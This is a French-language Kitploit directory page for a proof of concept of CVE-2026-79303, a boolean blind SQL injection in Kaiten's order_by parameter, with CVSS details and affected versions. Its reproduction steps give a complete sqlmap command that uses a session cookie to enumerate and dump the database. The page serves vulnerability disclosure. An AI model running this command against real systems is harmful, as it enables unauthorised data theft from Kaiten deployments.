Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-79303 — Preuve de concept pour CVE-2026-79303, une injection SQL booléenne aveugle critique dans Kaiten affectant les paramètres order_by et order_direction, avec étapes de reproduction et détails CVSS 9.9. | Kitploit
Outils/GitHubGitHub/4ybrick/cve-2026-79303
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHub4ybrick/cve-2026-79303

CVE-2026-79303

Preuve de concept pour CVE-2026-79303, une injection SQL booléenne aveugle critique dans Kaiten affectant les paramètres order_by et order_direction, avec étapes de reproduction et détails CVSS 9.9.

Voir le dépôt
il y a 17h 34mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-79303

Injection SQL booléenne aveugle

Description : Des instructions SQL dynamiques sont générées sans la validation de données requise et sans utiliser d'instructions paramétrées ni de procédures stockées.

Impact : SQLi

Vecteur CVSSv3.1 : AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (9.9 Critique)

CWE : CWE-89 : Neutralisation incorrecte d'éléments spéciaux utilisés dans une commande SQL (« Injection SQL »)

Composant affecté : Paramètres GET order_by et order_direction

Fournisseur : kaiten

Produit affecté

  • Versions de kaiten : 57.192.20 < 57.214.26

Étapes pour reproduire :

  1. sqlmap -u "https://[kaiten ip]/api/cards?version=2&limit=51&query=1&order_by=1&order_direction=desc&search_fields=title" --cookie="connect.sid=[value]" -p 'order_by' --technique B --level 5 --dbms postgresql --dbs --dump
  2. Tapez n (ne pas fusionner votre cookie avec un nouveau) -> C
Уязвимый параметр

Découvreur

  • Danil Belov

Références

  • https://nvd.nist.gov/vuln/detail/CVE-2026-79303
  • https://bdu.fstec.ru/vul/2025-02933
  • https://kaiten.ru/
Télécharger l’outil